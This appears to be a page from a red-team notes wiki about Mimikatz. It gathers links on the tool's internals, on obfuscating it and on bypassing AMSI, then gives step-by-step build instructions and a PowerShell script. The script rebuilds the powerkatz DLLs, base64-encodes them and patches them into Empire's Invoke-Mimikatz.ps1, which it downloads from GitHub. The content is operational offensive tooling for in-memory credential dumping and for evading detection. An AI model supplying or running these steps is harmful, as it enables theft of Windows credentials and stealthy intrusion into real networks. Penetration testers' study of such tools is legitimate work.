Comment on page
Mimikatz

​https://tools.thehacker.recipes/mimikatz​
​https://blog.xpnsec.com/exploring-mimikatz-part-1/​
​https://blog.xpnsec.com/exploring-mimikatz-part-2/​
​https://www.praetorian.com/blog/inside-mimikatz-part1/​
​https://www.praetorian.com/blog/inside-mimikatz-part2/​
​https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html​
Obfuscate Mimikatz
​https://s3cur3th1ssh1t.github.io/Bypass-AMSI-by-manual-modification-part-II/​
​https://s3cur3th1ssh1t.github.io/Building-a-custom-Mimikatz-binary/​
Invoke-Mimikatz
​http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/​
Update .ps1
​http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/​
Update the Invoke-Mimikatz.ps1 PowerShell script:
1.Grab source code zip from the latest (or any one you want) release of Mimikatz.
2.Open the solution in Visual Studio.
3.Select the Second_Release_PowerShell target option and compile for Win32.
4.Right-click on mimikatz solution > Properties > C/C++ > Set Treat warnings as errors to No (/WX-) > OK.
5.Compile for x64.
6.Transform the resulting powerkatz DLLs to base64 and replace the $PEBytes32 and $PEBytes64 vars at the bottom of Invoke-Mimikatz.ps1 with a PowerShell script below.
Update-InvokeMimikatz.ps1
$powerkatz32 = [System.IO.File]::ReadAllBytes("Win32\powerkatz.dll")
$powerkatz64 = [System.IO.File]::ReadAllBytes("x64\powerkatz.dll")
$encPowerkatz32 = [System.Convert]::ToBase64String($powerkatz32)
$encPowerkatz64 = [System.Convert]::ToBase64String($powerkatz64)
$invokeMimikatz = (New-Object Net.WebClient).DownloadString("https://github.com/BC-SECURITY/Empire/raw/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1") -replace '\$PEBytes32 = .*$', ('$PEBytes32 = ' + "'$encPowerkatz32'")
$invokeMimikatz -replace '\$PEBytes64 = .*$', ('$PEBytes64 = ' + "'$encPowerkatz64'") > Invoke-Mimikatz.ps1
Last modified 3mo ago